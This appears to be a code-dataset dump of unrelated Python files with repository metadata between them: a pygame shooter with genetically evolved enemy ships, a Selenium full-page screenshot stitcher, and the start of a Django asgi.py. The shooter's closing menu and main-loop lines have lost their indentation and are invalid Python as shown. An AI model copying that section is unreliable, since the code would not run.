            self.rect.x = min(self.rect.x + 2, 960)
        else:
            # Cycle through the idle frames (0..4).
            self.index += 1
            if self.index > 4:
                self.index = 0
        self.image = self.images[self.index]
# *****************************************************************************
# Creates Player Projectile class
# *****************************************************************************
class Player_Projectile(pygame.sprite.Sprite):
    """A missile fired by the player's ship.

    Frame layout inside self.images:
      0-9   flight animation frames
      10-18 explosion animation frames
    """
    # Initialize the class and the sprites
    def __init__(self,player_projectile_x,player_projectile_y):
        super().__init__()
        self.images = []
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_000.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_001.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_002.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_003.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_004.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_005.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_006.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_007.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_008.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Flying_009.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_000.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_001.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_002.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_003.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_004.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_005.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_006.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_007.png'))
        self.images.append(pygame.image.load('Sprites/Player_Ship/Missile_3_Explosion_008.png'))
        self.index = 0
        self.image = self.images[self.index]
        # Position/collision rectangle sized to the first frame.
        self.rect = pygame.Rect(player_projectile_x,player_projectile_y,self.image.get_rect()[2],self.image.get_rect()[3])
    # Update function is called once every frame
    def update(self,surface):
        """Advance the flight animation and move the missile up the screen."""
        # Change index for animation of projectile moving forward
        self.index += 1
        if self.index > 9:
            self.index = 0
        # Move sprite forward
        self.rect.y = self.rect.y - 2
        # Assign index of sprite
        self.image = self.images[self.index]
    # Called once a player projectile hits enemy
    def player_projectile_explosion(self):
        """Draw an explosion frame at the point of impact.

        Relies on the module-level ``player_projectile_list`` group and
        ``screen`` surface.  NOTE(review): jumps straight to frame 15 and
        draws only that single frame instead of playing frames 10-18 --
        presumably a deliberate quick flash; confirm.
        """
        # Draws an explosion on the location of collision
        self.index = 15
        self.image = self.images[self.index]
        # Re-centre the larger explosion frame over the missile's position.
        self.rect.x = self.rect.x - 25
        self.rect.y = self.rect.y - 20
        player_projectile_list.draw(screen)
        pygame.display.update()
# *****************************************************************************
# Creates Enemy Ship class
# *****************************************************************************
class Enemy_Ship(pygame.sprite.Sprite):
    """Genetic-algorithm controlled enemy ship.

    The chromosome (a list) encodes the ship's abilities and fitness:
      [0] can shoot, [1] can move, [2] bottom shield, [3] top shield,
      [4] left shield, [5] right shield, [6] fitness value.
    Fitness is adjusted by update_fitness() as the ship survives, gets hit,
    or hits the player, and is written back into chromosome[6].
    """
    # Initialize the class and the sprites
    def __init__(self,chromosome,enemy_ship_x,enemy_ship_y,enemy_ship_tag):
        """Create the ship at (enemy_ship_x, enemy_ship_y).

        enemy_ship_tag identifies this ship so shields/projectiles can be
        traced back to it for fitness updates.
        """
        super().__init__()
        self.images = []
        self.move_enemy = False
        self.move_left = True
        # Timers (ms ticks) for firing cadence and survival bonus.
        self.enemy_fire_timer = pygame.time.get_ticks()
        self.enemy_survive_timer = pygame.time.get_ticks()
        self.chaingun_enemy = False
        self.bottom_shield = None
        self.top_shield = None
        self.left_shield = None
        self.right_shield = None
        self.enemy_ship_tag = enemy_ship_tag
        self.chromosome = chromosome
        self.fitness_value = self.chromosome[6]
        # Give enemy ability to shoot back
        if self.chromosome[0] == 1:
            self.chaingun_enemy = True
        # Give enemy ability to move
        if self.chromosome[1] == 1:
            self.move_enemy = True
        # Give enemy bottom shield
        if self.chromosome[2] == 1:
            bottom_shield = Enemy_Shields(0, enemy_ship_x+10, enemy_ship_y+65, chromosome,self.enemy_ship_tag)
            all_sprites_list.add(bottom_shield)
            enemy_shield_list.add(bottom_shield)
            self.bottom_shield = bottom_shield
        # Give enemy top shield
        if self.chromosome[3] == 1:
            top_shield = Enemy_Shields(1,enemy_ship_x+10,enemy_ship_y-10,chromosome,self.enemy_ship_tag)
            all_sprites_list.add(top_shield)
            enemy_shield_list.add(top_shield)
            self.top_shield = top_shield
        # Give enemy left shield
        if self.chromosome[4] == 1:
            left_shield = Enemy_Shields(2,enemy_ship_x-15,enemy_ship_y-10,chromosome,self.enemy_ship_tag)
            all_sprites_list.add(left_shield)
            enemy_shield_list.add(left_shield)
            self.left_shield = left_shield
        # Give enemy right shield
        if self.chromosome[5] == 1:
            right_shield = Enemy_Shields(3,enemy_ship_x+110,enemy_ship_y-10,chromosome,self.enemy_ship_tag)
            all_sprites_list.add(right_shield)
            enemy_shield_list.add(right_shield)
            self.right_shield = right_shield
        # Frame 0 is the ship itself; the rest are explosion frames.
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Enemy_Ship.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_000.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_004.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_005.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_007.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_009.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_011.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_013.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_016.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_017.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_019.png'))
        self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_021.png'))
        self.index = 0
        self.image = self.images[self.index]
        # Rect is slightly smaller than the sprite image (tighter hitbox).
        self.rect = pygame.Rect(enemy_ship_x,enemy_ship_y,self.image.get_rect()[2]-10,self.image.get_rect()[3]-25)
    # Update function is called once every frame
    def update(self,screen):
        """Per-frame movement, firing and survival-bonus logic.

        NOTE(review): the `screen` parameter shadows the module-level
        `screen` surface and is unused here.
        """
        global ENEMY_MISSILE_TIMER
        # NOTE(review): self.index grows without bound and self.image is
        # never reassigned here -- this increment looks like a leftover
        # from the projectile classes; confirm before relying on it.
        self.index += 1
        # Move enemy left/right depending on the location of the sprite on screen
        if self.move_enemy == True:
            if self.move_left == True:
                # Stop sprite from moving off screen left
                if self.rect.x < 15:
                    self.move_left = False
                self.rect.x = self.rect.x - 3
            else:
                # Stop sprite from moving off screen right
                if self.rect.x > 890:
                    self.move_left = True
                self.rect.x = self.rect.x + 3
        # Fire projectiles at a time interval if enemy can shoot
        # This time interval decreases as game difficulty increases
        if pygame.time.get_ticks() - self.enemy_fire_timer >= ENEMY_MISSILE_TIMER and self.chaingun_enemy == True:
            enemy_projectile = Enemy_Projectile(self.enemy_ship_tag,self.rect.x+75,self.rect.y+75)
            enemy_projectile_list.add(enemy_projectile)
            all_sprites_list.add(enemy_projectile)
            self.enemy_fire_timer = pygame.time.get_ticks()
        # Increase the fitness value of enemies survived for more than 5 seconds
        # The longer the enemy survives, the higher the fitness
        if pygame.time.get_ticks() - self.enemy_survive_timer >= 5000:
            self.fitness_value = self.fitness_value + 2
            self.chromosome[6] = self.fitness_value
            self.enemy_survive_timer = pygame.time.get_ticks()
    # Called when player projectile hits enemy or enemy projectile hits player
    def update_fitness(self,Message):
        """Adjust this ship's fitness according to the collision event.

        Message is one of 'Shield_Hit' (-1), 'Enemy_Hit' (-2, shields
        destroyed), or 'Player_Hit' (+4). Fitness is floored at 0 for the
        penalty cases and always written back to chromosome[6].
        """
        global GENERATE_GAME_OBJECTS
        # When player projectile hits enemy shield
        if Message == 'Shield_Hit':
            # Reduce fitness value by one and assign new fitness to chromosome
            self.fitness_value = self.fitness_value - 1
            if self.fitness_value < 0:
                self.fitness_value = 0
            self.chromosome[6] = self.fitness_value
        # When player projectile hits enemy
        elif Message == 'Enemy_Hit':
            # Destroy shields of enemy hit
            shield_type_list = [self.bottom_shield,self.top_shield,self.left_shield,self.right_shield]
            for shield in shield_type_list:
                if enemy_shield_list.has(shield):
                    enemy_shield_list.remove(shield)
                    all_sprites_list.remove(shield)
            # Reduce fitness value by two and assign new fitness to chromosome
            self.fitness_value = self.fitness_value - 2
            if self.fitness_value < 0:
                self.fitness_value = 0
            self.chromosome[6] = self.fitness_value
            # Regenerate game objects if all enemies are destroyed
            if len(enemy_list) == 0:
                GENERATE_GAME_OBJECTS = True
        # When enemy projectile hits player
        elif Message == 'Player_Hit':
            # Increase fitness value by four and assign new fitness to chromosome
            self.fitness_value = self.fitness_value+4
            self.chromosome[6] = self.fitness_value
            # Regenerate game objects if player is destroyed
            GENERATE_GAME_OBJECTS = True
# *****************************************************************************
# Creates Enemy Shields class
# *****************************************************************************
class Enemy_Shields(pygame.sprite.Sprite):
    """Directional shield sprite that belongs to one enemy ship.

    shield_index selects both the image and the travel limits:
    0 = bottom, 1 = top, 2 = left, 3 = right.
    """
    # Initialize the class and the sprites
    def __init__(self,shield_index,shield_x,shield_y,chromosome,enemy_ship_tag):
        super().__init__()
        # The shield moves only when its owning ship's chromosome enables movement.
        self.move_enemy = chromosome[1] == 1
        self.move_left = True
        self.shield_index = shield_index
        self.enemy_ship_tag = enemy_ship_tag
        self.images = [
            pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_bottom.png'),
            pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_top.png'),
            pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_left.png'),
            pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_right.png'),
        ]
        self.index = shield_index
        self.image = self.images[self.index]
        shape = self.image.get_rect()
        self.rect = pygame.Rect(shield_x, shield_y, shape[2], shape[3])
    # Update function is called once every frame
    def update(self,surface):
        """Slide left/right with the owning ship, bouncing at per-side limits."""
        if not self.move_enemy:
            return
        # (leftmost x, rightmost x) travel limits for this shield's side.
        if self.shield_index == 2:
            left_limit, right_limit = 0, 874
        elif self.shield_index == 3:
            left_limit, right_limit = 125, 999
        else:
            left_limit, right_limit = 25, 899
        if self.move_left:
            if self.rect.x < left_limit:
                self.move_left = False
            self.rect.x -= 3
        else:
            if self.rect.x > right_limit:
                self.move_left = True
            self.rect.x += 3
# *****************************************************************************
# Creates Enemy Projectile class
# *****************************************************************************
class Enemy_Projectile(pygame.sprite.Sprite):
    """Missile fired downward by an enemy ship.

    Carries its owner's enemy_ship_tag so a hit on the player can be
    credited back to the firing ship's fitness.
    """
    # Initialize the class and the sprites
    def __init__(self,enemy_ship_tag,enemy_projectile_x,enemy_projectile_y):
        """Load animation frames and place the missile sprite."""
        super().__init__()
        self.images = []
        self.enemy_ship_tag = enemy_ship_tag
        # Flying animation: Missile_1_Flying_000.png .. _009.png
        for frame in range(10):
            self.images.append(pygame.image.load(
                'Sprites/Enemy_Ship/Missile_1_Flying_%03d.png' % frame))
        # Explosion animation: Missile_1_Explosion_000.png .. _008.png
        for frame in range(9):
            self.images.append(pygame.image.load(
                'Sprites/Enemy_Ship/Missile_1_Explosion_%03d.png' % frame))
        self.index = 0
        self.image = self.images[self.index]
        self.rect = pygame.Rect(enemy_projectile_x, enemy_projectile_y,
                                self.image.get_rect()[2], self.image.get_rect()[3])
    # Update function is called once every frame
    def update(self,surface):
        """Advance the flying animation one frame and move the missile down."""
        self.index += 1
        if self.index > 9:  # the flying animation wraps over frames 0-9
            self.index = 0
        # Enemy missiles travel down the screen.
        self.rect.y = self.rect.y + 2
        self.image = self.images[self.index]
    # Called once an enemy projectile hits player
    def enemy_projectile_explosion(self):
        """Switch to an explosion frame at the impact point and redraw now."""
        self.index = 15
        # Shift so the larger explosion frame sits over the impact point.
        # (The original also had a no-op `self.rect.y = self.rect.y`,
        # removed here.)
        self.rect.x = self.rect.x-25
        self.image = self.images[self.index]
        enemy_projectile_list.draw(screen)
        pygame.display.update()
# *****************************************************************************
# Creates Star Field class
# *****************************************************************************
class Star_Field(pygame.sprite.Sprite):
    """A single background star that scrolls down and despawns off-screen."""
    # Initialize the class and the sprites
    def __init__(self,star_pos_x,star_pos_y):
        super().__init__()
        star_image = pygame.image.load('Sprites/Star_Field/star.png')
        self.images = [star_image]
        self.index = 0
        self.image = star_image
        size = star_image.get_rect()
        self.rect = pygame.Rect(star_pos_x, star_pos_y, size[2], size[3])
    # Update function is called once every frame
    def update(self,surface):
        """Scroll downward; remove the star once it leaves the screen."""
        self.rect.y += 2
        if self.rect.y > 768:
            # Destroy the game object once it is off screen.
            star_field_list.remove(self)
# Start game clock to synchronize events
clock = pygame.time.Clock()
# *****************************************************************************
# Called when Start Game is selected from Main Menu
# *****************************************************************************
def play_function():
    """Run the main gameplay loop (entered from the menu's Start Game).

    Each "episode" breeds a new enemy population with the genetic
    algorithm, spawns the player and four enemies, then processes input,
    collisions and fitness updates at 60 FPS until the window closes or
    Esc returns to the menu.
    """
    # Global variables
    global RUN_GAME
    global GENERATE_GAME_OBJECTS
    global clock
    global STAR_FIELD_TIMER
    global EPISODE_COUNT
    global PLAYER_TORPEDO_FIRING_RATE
    global MUTATION_RATE
    global COLOR_BLACK
    # Disable and reset Main Menu
    main_menu.disable()
    main_menu.reset(1)
    #Initialize variables
    EPISODE_COUNT = 0
    GENERATE_GAME_OBJECTS = True
    current_enemy_population = initial_population
    # Run Game loop
    while RUN_GAME:
        # Set Frame Rate to 60 FPS
        clock.tick(60)
        # An episode (re)starts whenever all enemies or the player died.
        if GENERATE_GAME_OBJECTS == True:
            # Clear existing game objects
            player_list.empty()
            all_sprites_list.empty()
            player_projectile_list.empty()
            enemy_projectile_list.empty()
            enemy_list.empty()
            enemy_shield_list.empty()
            # Render Episode no and Mutation Rate surfaces (blitted each frame)
            episode_info_count = episode_info_text.render('Episode:'+str(EPISODE_COUNT), 1, COLOR_WHITE)
            episode_info_mutation_rate = episode_info_text.render('Mutation Rate:'+str(MUTATION_RATE), 1, COLOR_WHITE)
            EPISODE_COUNT = EPISODE_COUNT + 1
            # Generating game objects and necessary sprite groups
            genetic_algorithm = Genetic_Algorithm(current_enemy_population, MUTATION_RATE, chromosome_length)
            generated_population = genetic_algorithm.generate_new_population()
            player = Player(512, 650)
            selected_chromosome_list=[]
            no_of_chromosomes_to_be_selected=4
            # Selecting 4 unique chromosome indices from a population of 6
            # This loop runs until four unique chromosome indices are selected
            while True:
                if no_of_chromosomes_to_be_selected == 0:
                    break
                selected_chromosome_index=random.randint(0, 5)
                if selected_chromosome_list.count(selected_chromosome_index) == 0:
                    selected_chromosome_list.append(selected_chromosome_index)
                    no_of_chromosomes_to_be_selected = no_of_chromosomes_to_be_selected -1
            enemy0 = Enemy_Ship(generated_population[selected_chromosome_list[0]], 100, 10, 0)
            enemy1 = Enemy_Ship(generated_population[selected_chromosome_list[1]], 600, 140, 1)
            enemy2 = Enemy_Ship(generated_population[selected_chromosome_list[2]], 200, 270, 2)
            enemy3 = Enemy_Ship(generated_population[selected_chromosome_list[3]], 800, 400, 3)
            enemy_ship_list = [enemy0, enemy1, enemy2, enemy3]
            player_list.add(player)
            all_sprites_list.add(player)
            all_sprites_list.add(enemy0)
            all_sprites_list.add(enemy1)
            all_sprites_list.add(enemy2)
            all_sprites_list.add(enemy3)
            enemy_list.add(enemy0)
            enemy_list.add(enemy1)
            enemy_list.add(enemy2)
            enemy_list.add(enemy3)
            GENERATE_GAME_OBJECTS = False
        # Check for Pygame events
        playevents = pygame.event.get()
        for event in playevents:
            # Exit game if window is closed
            if event.type == pygame.QUIT:
                RUN_GAME = False
                exit()
            # Check if Space Bar is pressed
            if event.type == pygame.KEYUP and event.key == pygame.K_SPACE:
                # Fire no of projectiles according to player firing rate
                # Player firing rate decreases as game difficulty increases
                if len(player_projectile_list) < PLAYER_TORPEDO_FIRING_RATE:
                    player_projectile = Player_Projectile(player.rect.x + 25, player.rect.y - 35)
                    all_sprites_list.add(player_projectile)
                    player_projectile_list.add(player_projectile)
            # If Esc key is pressed, enable Main Menu and remove game objects from screen
            if event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE and main_menu.is_disabled():
                main_menu.enable()
                GENERATE_GAME_OBJECTS = False
                # Exit this function and return to the program's main loop
                return
        # Pass Pygame event to Main Menu
        main_menu.mainloop(playevents)
        # Generate the Star Field
        # Creates Star sprites at random points on the screen
        if pygame.time.get_ticks() - STAR_FIELD_TIMER >= 500:
            for star in range(10):
                star_x = random.randint(1, 1020)
                star_y = random.randint(-1000, 0)
                star0 = Star_Field(star_x, star_y)
                star_field_list.add(star0)
            STAR_FIELD_TIMER = pygame.time.get_ticks()
        # Draw screen background and episode info
        screen.fill(COLOR_BLACK)
        screen.blit(episode_info_count, (850,5))
        screen.blit(episode_info_mutation_rate, (850, 30))
        # Call update functions of the sprite groups
        star_field_list.update(screen)
        all_sprites_list.update(screen)
        # Check all the player projectiles for collisions with enemy
        for projectile in player_projectile_list:
            # If a projectile hits enemy or shield,
            # 1. call relevant fitness update functions
            # 2. draw explosion
            # 3. remove colliding game objects from screen
            # Tags are used to identify which object was hit
            player_projectile_hit_enemy_list = pygame.sprite.spritecollide(projectile, enemy_list, True)
            player_projectile_hit_enemy_shield_list = pygame.sprite.spritecollide(projectile, enemy_shield_list, True)
            for enemy_hit in player_projectile_hit_enemy_list:
                enemy_hit.update_fitness("Enemy_Hit")
                projectile.player_projectile_explosion()
                player_projectile_list.remove(projectile)
                all_sprites_list.remove(projectile)
            for shield_hit in player_projectile_hit_enemy_shield_list:
                shield_enemy_list = enemy_ship_list
                projectile.player_projectile_explosion()
                # Credit the shield hit to the ship that owns the shield.
                for enemy in shield_enemy_list:
                    if enemy.enemy_ship_tag == shield_hit.enemy_ship_tag:
                        enemy.update_fitness("Shield_Hit")
                player_projectile_list.remove(projectile)
                all_sprites_list.remove(projectile)
            # Remove player projectile if it is off screen
            if projectile.rect.y < -20:
                player_projectile_list.remove(projectile)
                all_sprites_list.remove(projectile)
        # Check all the enemy projectiles for collisions with player
        for enemy_projectile in enemy_projectile_list:
            enemy_projectile_hit_list = pygame.sprite.spritecollide(enemy_projectile, player_list, True)
            # If a projectile hits player,
            # 1. draw explosion
            # 2. call relevant fitness update functions
            # 3. remove colliding game objects from screen
            for player_hit in enemy_projectile_hit_list:
                enemy_projectile.enemy_projectile_explosion()
                firing_enemy_list = enemy_ship_list
                # Reward the ship whose missile hit the player.
                for enemy in firing_enemy_list:
                    if enemy.enemy_ship_tag == enemy_projectile.enemy_ship_tag:
                        enemy.update_fitness("Player_Hit")
                enemy_projectile_list.remove(enemy_projectile)
                all_sprites_list.remove(enemy_projectile)
            # Remove enemy projectile if it is off screen
            if enemy_projectile.rect.y > 768:
                enemy_projectile_list.remove(enemy_projectile)
                all_sprites_list.remove(enemy_projectile)
        # Draw relevant sprite groups on screen and update
        star_field_list.draw(screen)
        all_sprites_list.draw(screen)
        pygame.display.update()
# Used by menus to fill background color
def main_background():
    """Clear the whole screen with the menu background color."""
    screen.fill(COLOR_BACKGROUND)
# Change game difficulty
# Player firing rate and enemy firing rate will change according to difficulty
def change_game_difficulty(d):
    """Store the chosen difficulty and apply its firing-rate settings."""
    global PLAYER_TORPEDO_FIRING_RATE
    global ENEMY_MISSILE_TIMER
    GAME_DIFFICULTY[0] = d
    # Difficulty -> (max simultaneous player torpedoes, ms between enemy shots).
    settings = {
        'EASY': (5, 5000),
        'MEDIUM': (3, 3000),
        'HARD': (1, 1000),
    }
    if d in settings:
        PLAYER_TORPEDO_FIRING_RATE, ENEMY_MISSILE_TIMER = settings[d]
# Change mutation rate of the algorithm
def change_mutation_rate(d):
    """Record the selected mutation rate in the shared list and the global."""
    global MUTATION_RATE
    MUTATION_RATE_MATRIX[0] = d
    MUTATION_RATE = d
# Main Menu of the game
main_menu = pygameMenu.Menu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size = 30,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
title = 'Main menu',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# About Menu where players can see information about the game
about_menu = pygameMenu.TextMenu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size_title = 30,
font_title = pygameMenu.fonts.FONT_8BIT,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
text_color = COLOR_BLACK,
text_fontsize = 20,
title = 'About',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# Help Menu where players can see information about game controls
help_menu = pygameMenu.TextMenu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size_title = 30,
font_title = pygameMenu.fonts.FONT_8BIT,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
text_color = COLOR_BLACK,
text_fontsize = 20,
title = 'Help',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# Play Menu where players can change game difficulty and mutation rate
play_menu = pygameMenu.Menu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size = 30,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
title = 'Play menu',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# Calls play_function when Start Game is pressed
play_menu.add_option('Start Game', play_function)
# Selector to select game dificulty
# On change calls change_game_difficulty function
play_menu.add_selector('Select Game Difficulty', [('Easy', 'EASY'),
('Medium', 'MEDIUM'),
('Hard', 'HARD')],
onreturn = None,
onchange = change_game_difficulty)
# Selector to select mutation rate
# On change calls change_mutation_rate function
play_menu.add_selector('Select Mutation Rate', [('0.2', 0.2),
('0.4', 0.4),
('0.6', 0.6),
('0.8', 0.8),],
onreturn = None,
onchange = change_mutation_rate)
# Return to Main Menu when this option is selected
play_menu.add_option('Return to main menu', PYGAME_MENU_BACK)
# Adding options to the Main Menu
main_menu.add_option('Play Game', play_menu)
main_menu.add_option('Help', help_menu)
main_menu.add_option('About', about_menu)
main_menu.add_option('Quit', PYGAME_MENU_EXIT)
# Write the game info on About Menu
for line in ABOUT:
about_menu.add_line(line)
about_menu.add_line(PYGAMEMENU_TEXT_NEWLINE)
# Return to Main Menu when this option is selected
about_menu.add_option('Return to main menu', PYGAME_MENU_BACK)
# Write the game controls info on Help Menu
for line in HELP:
help_menu.add_line(line)
help_menu.add_line(PYGAMEMENU_TEXT_NEWLINE)
# Return to Main Menu when this option is selected
help_menu.add_option('Return to main menu', PYGAME_MENU_BACK)
# Main loop of the program
while True:
# Set Frame Rate to 60 FPS
clock.tick(60)
# Check for Pygame events
events = pygame.event.get()
# Exit game if window is closed
for event in events:
if event.type == pygame.QUIT:
exit()
# Pass Pygame event to Main Menu
main_menu.mainloop(events)
# Update screen
pygame.display.update()
| [
"noreply@github.com"
] | NeonInc.noreply@github.com |
20438ca260c2e4f2b4b61fc4b437bb30e8f75350 | 3645e93b899a53a74a456250d95fb63de19513bf | /test.py | 1a8ce91ae02c59b760d5184762f135f3f04d5f4a | [] | no_license | lafftar/headfull-browser-pagescreenshot | 82e41bef2518709de8512cb8f252b347318555c8 | e9ce7e5fa60d202ffbb3f19d05a436264d2bb8c0 | refs/heads/master | 2022-11-25T15:47:08.661774 | 2020-08-02T09:21:01 | 2020-08-02T09:21:01 | 284,429,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,586 | py | from re import sub
from time import time
from io import BytesIO
from PIL import Image
from main import init_chrome
from selenium.common.exceptions import NoSuchElementException
def calc_height_and_scrolls(scroll_height=3700, max_height=1000):
    """Pick a per-screenshot height in (500, max_height] for page stitching.

    Returns a dict with:
      "Ideal Height"     -- the chosen capture height, and
      "Ideal Scroll Num" -- how many scrolls of that height cover scroll_height.

    Prefers the largest height that divides scroll_height exactly; when no
    divisor exists (e.g. a prime scroll_height) it returns the height with
    the smallest remainder, scanning from max_height downward (first best
    wins, stopping early at remainder 1). Returns {} if the scan range is
    empty, mirroring the original behavior.
    """
    best = None
    best_remainder = None
    for height in range(max_height, 500, -1):
        remainder = scroll_height % height
        if remainder == 0:
            # Exact fit. Integer arithmetic avoids the float-rounding risk
            # of the previous `(a / b).is_integer()` check.
            return {
                "Ideal Height": height,
                "Ideal Scroll Num": scroll_height // height,
            }
        if best_remainder is None or remainder < best_remainder:
            best_remainder = remainder
            best = {
                "Ideal Height": height,
                "Ideal Scroll Num": int(scroll_height / height),
            }
            if remainder == 1:  # can't do better than 1 without an exact divisor
                break
    return best if best is not None else {}
def save_full_page_screenshot(driver, output_path):
    """Stitch screenshots of the '#content' element into one image file.

    Scrolls the page in even steps sized by calc_height_and_scrolls(),
    captures '#content' at each step, crops the fixed navbar off every
    capture after the first, pastes the pieces into one tall image, then
    crops to the accumulated height and saves to output_path.
    """
    scroll_height = driver.execute_script(
        "return document.getElementById('content').scrollHeight")
    # Height of the fixed navbar (class 'h100'); it is cropped off every
    # capture below the first so it does not repeat in the stitched image.
    navbar_height = driver.execute_script(
        "return document.getElementsByClassName('h100')[0].scrollHeight")
    window_height = driver.execute_script("return window.innerHeight")
    final_img_height = scroll_height
    topmost_part = Image.open(BytesIO(driver.find_element_by_id("content").screenshot_as_png))
    final_image = Image.new('RGB', (topmost_part.width, final_img_height))
    final_image.paste(topmost_part, (0, 0))
    ideal_nums = calc_height_and_scrolls(scroll_height)
    ideal_height = ideal_nums['Ideal Height']
    driver.set_window_size(1200, ideal_height)
    paste_height = 0
    for scrolls in range(1, ideal_nums['Ideal Scroll Num'] + 1):
        # NOTE(review): scrolls by the visible height minus the navbar --
        # assumes the navbar stays fixed while '#content' scrolls; confirm.
        driver.execute_script(f"window.scrollTo(0, {(window_height - navbar_height) * scrolls});")
        next_part = Image.open(BytesIO(driver.find_element_by_id("content").screenshot_as_png))
        # Drop the navbar from this capture before stitching.
        next_part = next_part.crop((0, navbar_height, topmost_part.width, next_part.height))
        paste_height = scrolls * next_part.height
        final_image.paste(next_part, (0, paste_height))
        final_img_height = paste_height + next_part.height
    # Bug fix: Image.crop() returns a NEW image; the original discarded the
    # result, so the saved file was never trimmed to final_img_height.
    final_image = final_image.crop((0, 0, topmost_part.width, final_img_height))
    final_image.save(output_path)
def test():
    """Drive Chrome through a sample page and save a stitched screenshot.

    Blocks on input() at the end so the saved page can be inspected
    before the browser is closed.
    """
    driver = init_chrome()
    driver.get("https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression-in-python-taking-union-o?rq=1")
    # get rid of coverings -- presumably the login overlay; missing is fine
    try:
        driver.find_element_by_xpath('//*[@id="openid-buttons"]/button[4]').click()
    except NoSuchElementException:
        pass
    # make sure whatever you put here doesn't have special characters in it.
    # Output file name derived from the page title, alphanumerics only.
    path = f"{sub('[^A-Za-z0-9]+', ' ', driver.title)}.jpg"
    t1 = time()
    save_full_page_screenshot(driver, path)
    t2 = time()
    # Report how long the capture took, in seconds.
    print(t2-t1)
    # hang the program to check the page
    input()
    driver.close()
    driver.quit()
test() | [
"tibabalase@gmail.com"
] | tibabalase@gmail.com |
3186cf988967384dfea7e14a0e164a35f8ed2815 | 302336c942159316dde35428a12db42829ad3047 | /capture/asgi.py | 90a62ac86668a47ff5f5b497f9a4a1a2cf52e6a2 | [] | no_license | vishnuteja1000/django-photographer-website | d57a9ab937e6a87ddfca2c6f70a50fc3986809d2 | fe5b48bc95405ff38af78e48bade2341eff31432 | refs/heads/master | 2022-11-18T15:33:11.673418 | 2020-07-18T05:46:50 | 2020-07-18T05:46:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
ASGI config for capture project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
